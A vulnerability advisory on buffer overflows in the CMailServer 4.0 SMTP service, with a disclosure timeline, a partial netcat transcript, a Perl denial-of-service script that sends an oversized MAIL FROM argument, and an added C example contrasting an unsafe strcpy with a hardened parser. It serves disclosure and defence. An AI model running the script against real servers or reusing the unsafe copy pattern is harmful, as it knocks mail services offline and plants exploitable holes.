Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0
http://www.youngzsoft.com
Discovered by Dennis Rand
------------------------------------------------------------------------

-----[SUMMARY

CMailServer, a small and easy to administer email server and web mail server, can help you build your own email server for Win NT/2000/XP. It enables you to send and receive email across the Internet or within your LAN. ESMTP authentication, ASP form web mail and multiple domain names are supported. CMailServer offers an unlimited email user license at a reasonable and affordable price compared to other email server software. For small to medium sized companies, CMailServer is an economic and effective solution for their e-mail management requirements. CMailServer also provides a full web mail service. The web mail is based on ASP, and you can customize the web mail interface freely.

The problem is a buffer overflow in the SMTP service of ESMTP CMailServer 4.0.2003.03.27 (the build shown in the transcript below; the same problem is reported for the earlier build 4.0.2002.11.24). An oversized argument to MAIL FROM or RCPT TO crashes the service, causing a denial of service. Because the overrun reaches the exception handler record on the stack, a carefully constructed argument allows a system compromise with code execution running as SYSTEM.

-----[AFFECTED SYSTEMS

Vulnerable systems:
 * ESMTP CMailServer 4.0.2003.03.27 SMTP Service
   (the earlier build 4.0.2002.11.24 is reported to have the same problem)

Immune systems:
 * ESMTP CMailServer 4.0.2003.03.30 SMTP Service

-----[SEVERITY

High - An attacker is able to cause a DoS against the SMTP service, and because the overflow overwrites the exception handler on the stack, can achieve a system compromise with code execution running as SYSTEM.

-----[DESCRIPTION OF WHAT THE VULNERABILITY IS

The vulnerability is a buffer overflow in the ESMTP CMailServer SMTP service. When an attacker sends an oversized argument in the "MAIL FROM" or the "RCPT TO" command, a fixed-size buffer overflows. The overrun reaches the structured exception handler record on the stack, so the crash can be turned into control of execution.
If the argument is carefully crafted, an attacker can execute arbitrary commands with SYSTEM privileges. The following transcript demonstrates a sample exploitation of the vulnerabilities (the oversized arguments themselves are omitted; the service stops responding after receiving them):

----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From :

The same vulnerability is in RCPT TO:

nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@somewhere.dk
250 Sender Ok
Rcpt To:
----------------------------- [Transcript] -----------------------------

----------------------------- [Exploit Code] -----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# USAGE: sploit.pl <target> <buffer length>
#
# Summary:
#
# The problem is a buffer overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shut down.
# It is there that we can actually overwrite the exception handler on the
# stack, allowing a system compromise with code execution running as SYSTEM.
#
# I've censored some of the source code out. =)
# (The buffer length that was hardcoded here is censored by the author;
# it has to be supplied on the command line instead.)
#
# Solution:
# None at this time
#
use strict;
use IO::Socket;

my ($target, $len) = @ARGV;
die "usage: $0 <target> <buffer length>\n" unless defined $target && defined $len;
my $port   = 25;
my $Buffer = "A" x $len;      # oversized MAIL FROM argument

my $sock = IO::Socket::INET->new(
    PeerAddr => $target,
    PeerPort => $port,
    Proto    => 'tcp'
) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/) {
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}
print $sock "HELO $target\r\n";
my $resp = <$sock>;
print $sock "MAIL FROM: $Buffer\@$target\r\n";   # the overflowing argument
$resp = <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
----------------------------- [Exploit Code] -----------------------------

-----[DETECTION

ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the above-described attacks. Earlier versions may be susceptible as well.
To determine if a specific implementation is vulnerable, experiment by following the above transcript against a non-production instance; a vulnerable service stops responding after the oversized argument.

-----[WORK AROUNDS

Upgrade as soon as possible to ESMTP CMailServer 4.0.2003.03.30 SMTP Service or later. The other workaround is to disable the SMTP service, but that is not much fun.

-----[VENDOR RESPONSE

Quoting YoungZSoft:
  I thank you very very much for your report. We will fix this as soon as possible.
  Yaoer

-----[DISCLOSURE TIMELINE

24/04/2003  Found the vulnerability and made an analysis.
29/04/2003  Contacted vendor at support@youngzsoft.net
30/04/2003  Received response from vendor with a fix to test.
01/05/2003  New version tested negative for the vulnerabilities.
10/05/2003  Public disclosure.

-----[ADDITIONAL INFORMATION

The vulnerability was discovered and reported by Dennis Rand.

-----[DISCLAIMER

The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever, including direct, indirect, incidental, consequential, loss of business profits or special damages.
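The advisory does not show CMailServer's code, so the following is an added example, not the vendor's source or the author's exploit: it shows the bug class described above (an unbounded copy of the MAIL FROM / RCPT TO argument into a fixed-size stack buffer) beside a hardened parser that rejects arguments over the RFC 5321 limits before copying anything. The 64-byte buffer in the unsafe version, the verb handling, the reply codes and the sample domain are assumptions; the Windows exception-handler overwrite itself is not reproduced here, only the overflow that makes it possible.

```c
/* Added example, not CMailServer code: vulnerable pattern beside a hardened
 * parser for the SMTP MAIL FROM / RCPT TO argument. Buffer sizes and reply
 * codes are assumptions; the SEH overwrite on Windows is not reproduced. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define SMTP_PATH_MAX 256   /* RFC 5321 4.5.3.1.3: max reverse/forward path */
#define SMTP_LINE_MAX 512   /* RFC 5321 4.5.3.1.6: max command line incl. CRLF */

/* Vulnerable pattern (assumed to resemble the original bug): the argument is
 * copied with no length check. Anything longer than 63 bytes overruns
 * 'sender', then the saved frame data and, on x86 Windows, the exception
 * handler record that the advisory mentions. Shown only to be recognised;
 * never feed it untrusted input. */
void handle_mail_from_unsafe(const char *line)
{
    char sender[64];
    const char *arg = line + strlen("MAIL FROM:");
    while (*arg == ' ')
        arg++;
    strcpy(sender, arg);             /* <-- the overflow */
    printf("250 Sender Ok (%s)\n", sender);
}

/* Match "<verb> :" case-insensitively (the transcript uses "Mail From :").
 * On success *rest points just past the colon. */
static int verb_matches(const char *line, const char *verb, const char **rest)
{
    size_t vlen = strlen(verb);
    if (strncasecmp(line, verb, vlen) != 0)
        return 0;
    line += vlen;
    while (*line == ' ' || *line == '\t')
        line++;
    if (*line != ':')
        return 0;
    *rest = line + 1;
    return 1;
}

/* Hardened: copy the path argument into a caller-supplied buffer only if it
 * is non-empty, within SMTP_PATH_MAX, free of control characters and fits
 * (with its NUL) in 'out'. Returns 0 on success, -1 on rejection. */
int smtp_extract_path(const char *line, const char *verb, char *out, size_t outlen)
{
    const char *arg, *end;
    size_t n, i;

    if (!verb_matches(line, verb, &arg))
        return -1;
    while (*arg == ' ' || *arg == '\t')
        arg++;
    end = arg + strcspn(arg, "\r\n");          /* stop at end of line */
    while (end > arg && (end[-1] == ' ' || end[-1] == '\t'))
        end--;
    n = (size_t)(end - arg);
    if (n == 0 || n > SMTP_PATH_MAX || n + 1 > outlen)
        return -1;
    for (i = 0; i < n; i++)
        if (iscntrl((unsigned char)arg[i]))
            return -1;
    memcpy(out, arg, n);
    out[n] = '\0';
    return 0;
}

/* Reply code a hardened server would send for one command line:
 * 500 line too long (checked before any parsing), 250 accepted,
 * 501 bad argument, 502 verb not handled by this example. */
int smtp_reply_code(const char *line)
{
    static const char *verbs[] = { "MAIL FROM", "RCPT TO" };
    char path[SMTP_PATH_MAX + 1];
    const char *rest;
    size_t i;

    if (strlen(line) > SMTP_LINE_MAX)
        return 500;
    for (i = 0; i < sizeof verbs / sizeof verbs[0]; i++)
        if (verb_matches(line, verbs[i], &rest))
            return smtp_extract_path(line, verbs[i], path, sizeof path) == 0 ? 250 : 501;
    return 502;
}

/* Build the kind of line the advisory's exploit sends ("<verb>: AAAA...@dom")
 * with 'fill' filler bytes and run it through the hardened parser.
 * Returns the reply code, or -1 if the line would not fit the local buffer. */
int smtp_reply_for_probe(const char *verb, size_t fill)
{
    char line[4096];
    size_t pos;

    if (fill > sizeof line - 64)
        return -1;
    pos = (size_t)snprintf(line, sizeof line, "%s: ", verb);
    memset(line + pos, 'A', fill);
    pos += fill;
    snprintf(line + pos, sizeof line - pos, "@somewhere.dk\r\n"); /* domain from the transcript */
    return smtp_reply_code(line);
}

int main(void)
{
    handle_mail_from_unsafe("MAIL FROM: admin@somewhere.dk");     /* short: fine */
    printf("%d %d %d\n", smtp_reply_for_probe("MAIL FROM", 10),   /* 250 */
           smtp_reply_for_probe("MAIL FROM", 300),                /* 501 */
           smtp_reply_for_probe("RCPT TO", 1000));                /* 500 */
    return 0;
}
```

The line-length check runs before any parsing so that an overlong command is refused without ever being copied, and the path check applies the same limit to both verbs, which matters here because the advisory reports the identical problem in MAIL FROM and RCPT TO.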